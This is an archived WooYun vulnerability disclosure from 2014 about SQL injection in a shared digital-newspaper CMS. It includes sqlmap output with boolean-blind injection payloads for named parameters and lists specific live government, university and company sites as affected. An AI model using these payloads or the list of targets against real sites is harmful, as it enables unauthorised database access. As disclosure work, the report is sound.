乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-15: 细节已通知厂商并且等待厂商处理中 2014-09-20: 厂商已经确认,细节仅向厂商公开 2014-09-23: 细节向第三方安全合作伙伴开放 2014-11-14: 细节向核心白帽子及相关领域专家公开 2014-11-24: 细节向普通白帽子公开 2014-12-04: 细节向实习白帽子公开 2014-12-14: 细节向公众公开
多个参数没过滤哦
1、从
双新盐都报:http://ydbd.yandu.gov.cn/view_content.asp?article_bianhao=20110621041
检测开始,发现article_bianhao这个参数没有过滤
GET parameter 'article_bianhao' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 82 HTTP(s) requests:---Place: GETParameter: article_bianhao Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: article_bianhao=20110621041' AND 3094=3094 AND 'sneh'='sneh---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access
扔进工具里
2、看了下该网站技术支持
http://www.shuzibao.com/
Copyright 2006-2009 jxvw, all rights reserved 南昌维网数字传媒有限公司 版权所有
从这里可以定位到该系统属于这家公司开发3、发现该网站数字报业务涉及经济晚报、都市消费报等企业级报刊以及各种大学报刊,截取部分
4、开始检测,发现在搜索页有两个参数都未过滤,造成了sql注入以内蒙古师大报为例
http://xb.imnu.edu.cn/index.asp?id=238&nodeno=1&st=search
---Place: GETParameter: nodeno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=238&nodeno=1 AND 5768=5768&st=searchPlace: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=238 AND 4449=4449&nodeno=1&st=search---[23:25:44] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access
两个参数都未做过滤的。。。
部分影响单位:
http://qk.cncico.com/index.asp?id=406&nodeno=1&st=search 浙江交通集团报http://xiajiang.shuzibao.com/index.asp?id=285&nodeno=1&st=search 今日峡江http://xb.imnu.edu.cn/index.asp?id=238&nodeno=1&st=search 内蒙古师大报http://xiaobao.just.edu.cn/index.asp?id=173&nodeno=1&st=search 江苏科技大学报http://epaper.cnjjwb.com/view_content.asp?article_bianhao=20140915011 经济晚报......
更多的影响站点可以从
http://www.shuzibao.com/product.asp
这里看到跑表跑字段实在是太慢了。。。不等了,注入点是存在的,建议修复下吧
囧
过滤参数
危害等级:高
漏洞Rank:16
确认时间:2014-09-20 08:53
暂无